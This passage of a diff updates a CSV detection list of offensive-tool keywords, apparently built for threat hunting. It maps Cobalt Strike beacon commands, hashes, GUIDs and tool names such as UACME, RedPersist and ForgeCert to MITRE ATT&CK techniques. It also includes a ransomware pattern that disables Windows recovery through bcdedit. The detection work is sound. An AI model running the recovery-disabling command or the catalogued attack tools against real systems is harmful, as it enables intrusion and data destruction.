T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*bawait_upload*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bawait_upload_raw*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bb3b1a1f-0447-42a6-955a-88681fb88499*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" -"*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*bblockdlls*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" @@ -7592,8 +7738,8 @@ "*bcc2_setenv*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcc2_spawn*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcdedit.exe /set {default} recoveryenabled No*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*BCHASH-Rijndael-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*BCHASH-Rijndael-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BCHASH-Rijndael-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BCHASH-Rijndael-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*bcrossc2_load_dyn*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*BC-SECURITY*","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BC-SECURITY*Malleable*","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" @@ -7601,10 +7747,10 @@ "*BC-SECURITY/Starkiller*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" "*bd346689-8ee6-40b3-858b-4ed94f08d40a*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*BD602C80-47ED-4294-B981-0119D2200DB8*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*bdamele/icmpsh*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*bdcsync*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" @@ -7613,7 +7759,7 @@ "*bdllload*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllspawn*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 